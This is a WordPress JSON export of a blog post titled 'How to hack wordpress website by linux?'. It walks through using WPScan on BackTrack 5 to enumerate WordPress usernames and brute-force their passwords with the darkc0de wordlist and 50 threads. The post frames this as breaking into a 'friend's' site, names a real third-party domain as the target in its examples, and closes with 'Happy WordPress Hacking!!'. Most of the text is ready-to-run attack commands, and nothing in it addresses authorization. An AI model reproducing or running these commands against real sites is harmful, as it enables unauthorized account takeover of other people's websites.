{"id":405,"date":"2016-01-15T16:12:29","date_gmt":"2016-01-15T16:12:29","guid":{"rendered":"http:\/\/sushilkumar.ind.in\/?p=405"},"modified":"2016-01-15T16:15:53","modified_gmt":"2016-01-15T16:15:53","slug":"how-to-hack-wordpress-website-by-linux","status":"publish","type":"post","link":"https:\/\/www.sushilkumar.ind.in\/blog\/wordpress\/how-to-hack-wordpress-website-by-linux\/","title":{"rendered":"How to hack wordpress website by linux?"},"content":{"rendered":"<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><b>WPScan.rb<\/b> is a nifty bit of program that allows you to scan WordPress sites for information as well as do some fun stuff.Say for example you want to &#8220;hack&#8221; into your friends WordPress site :-)&#8230;or just get some information, whatever.<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">I&#8217;m using BackTrack 5 r3 for this tutorial but you can use kali linux for this they are similar<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><span color=\"#134f5c\" style=\"color: #134f5c;\"><b>Step1: You can use it to enumerate usernames, so you can see what usernames are valid on the WordPress site by running this command:<\/b><\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><span color=\"#ff0000\" style=\"color: #ff0000;\"><b>ruby .\/wpscan.rb &#8211;url www.friends-site.com &#8211;enumerate u<\/b><\/span><\/p>\n<p class=\"separator\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"410\" data-permalink=\"https:\/\/www.sushilkumar.ind.in\/blog\/wordpress\/how-to-hack-wordpress-website-by-linux\/attachment\/2-1-2\/\" data-orig-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1.jpg\" data-orig-size=\"640,266\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"2 (1)\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1-300x125.jpg\" data-large-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1.jpg\" tabindex=\"0\" role=\"button\" src=\"http:\/\/sushilkumar.ind.in\/wp-content\/uploads\/2016\/01\/2-1-1.jpg\" alt=\"2 (1)\" width=\"640\" height=\"266\" class=\"alignnone size-full wp-image-410\" srcset=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1.jpg 640w, https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1-300x125.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><span color=\"#134f5c\" style=\"color: #134f5c;\"><b>Running this command against a real WordPress site will show something like this:\u00a0<\/b><\/span><\/p>\n<p class=\"separator\">\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"408\" data-permalink=\"https:\/\/www.sushilkumar.ind.in\/blog\/wordpress\/how-to-hack-wordpress-website-by-linux\/attachment\/2\/\" data-orig-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2.jpg\" data-orig-size=\"755,347\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"2\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-300x138.jpg\" data-large-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2.jpg\" tabindex=\"0\" role=\"button\" src=\"http:\/\/sushilkumar.ind.in\/wp-content\/uploads\/2016\/01\/2.jpg\" alt=\"2\" width=\"755\" height=\"347\" class=\"alignnone size-full wp-image-408\" srcset=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2.jpg 755w, https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-300x138.jpg 300w\" sizes=\"(max-width: 755px) 100vw, 755px\" \/><br \/>\n<\/span><b><span color=\"#134f5c\" style=\"color: #134f5c;\">Step2:<\/span><\/b><\/p>\n<p><b><span color=\"#134f5c\" style=\"color: #134f5c;\">Now that you know what the usernames are, you can then try to brute force it with a list of passwords. This process takes a while, and you have to have a word list. BackTrack 5 r3 comes with a decent word list, so I&#8217;ll use that in this example.<\/span><\/b><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><b><span color=\"#ff0000\" style=\"color: #ff0000;\">ruby .\/wpscan.rb &#8211;url www.friends-site.com &#8211;wordlist \/pentest\/passwords\/wordlists\/darkc0de.lst &#8211;username admin<\/span><\/b><\/p>\n<p><b><span color=\"#ff0000\" style=\"color: #ff0000;\"><br \/>\n<\/span><\/b><span color=\"#134f5c\" style=\"color: #134f5c;\">The above command is telling WPScan to attack your friends URL, using the username &#8220;admin&#8221; with the word list that is located in the<\/span><b><span color=\"#ff0000\" style=\"color: #ff0000;\"> \/pentest\/passwords\/wordlists\/<\/span><\/b><span color=\"#134f5c\" style=\"color: #134f5c;\"> folder of Back Track 5.<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">You can even add threading to make the process a little faster by using this switch: &#8211;threads 50<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">There are a few more things you can do, including scanning for what plugins the site uses, as well as telling you which ones are vulnerable.<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">Happy WordPress Hacking!!<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">or<\/span><\/p>\n<p><b><span color=\"#e43101\" size=\"4\" style=\"color: #e43101; font-size: large;\">How to Install WPScan?<\/span><\/b><\/p>\n<p>Before you install WPScan, you have to install number of dependencies essential by this tiny ruby application. BTW i am using BackTrack5 Linux.<\/p>\n<p><b>Dependencies :<\/b><\/p>\n<p><code>apt-get install libcurl4-gnutls-dev<br \/>\ngem install --user-install mime-types<br \/>\ngem install --user-install xml-simple<br \/>\ngem install --user-install typhoeus<\/code><\/p>\n<p><b>WPScan Installation :<\/b><\/p>\n<p><code>cd \/pentest\/web\/<br \/>\nwget http:\/\/wpscan.googlecode.com\/files\/wpscan-1.0.zip<br \/>\nunzip wpscan-1.0.zip<br \/>\ncd wpscan<\/code><\/p>\n<p><b><span color=\"#e43101\" size=\"4\" style=\"color: #e43101; font-size: large;\">How to use WPScan?<\/span><\/b><\/p>\n<p>It is almost cooked. One more thing we need here; is to download keywords database which will be used for brute forcing.<\/p>\n<p><code>wget http:\/\/static.hackersgarage.com\/darkc0de.lst.gz<br \/>\ngunzip darkc0de.lst.gz<\/code><\/p>\n<p><b>Example usage of this ant application :<\/b><\/p>\n<p>Do \u2018non-intrusive\u2019 checks\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --url www.hackersgarage.com<\/code><\/p>\n<p>Do wordlist password brute force on enumerated users using 50 threads\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --threads 50<\/code><\/p>\n<p>Do wordlist password brute force on the \u2018admin\u2019 username only\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --username admin<\/code><\/p>\n<p>Generate a new \u2018most popular\u2019 plugin list, up to 150 pages\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --generate_plugin_list 150<\/code><\/p>\n<p>Enumerate instaled plugins\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --enumerate p<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WPScan.rb is a nifty bit of program that allows you to scan WordPress sites for information as well as do some fun stuff.Say for example you want to &#8220;hack&#8221; into your friends WordPress site :-)&#8230;or just get some information, whatever. I&#8217;m using BackTrack 5 r3 for this tutorial but you can use kali linux for &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[13],"tags":[36,38,39,37],"class_list":["post-405","post","type-post","status-publish","format-standard","","category-wordpress","tag-hack","tag-linux","tag-website","tag-wordpress"],"jetpack_publicize_connections":[],"acf":[],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p99pkJ-6x","_links":{"self":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/posts\/405"}],"collection":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/comments?post=405"}],"version-history":[{"count":0,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/posts\/405\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/media?parent=405"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/categories?post=405"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/tags?post=405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}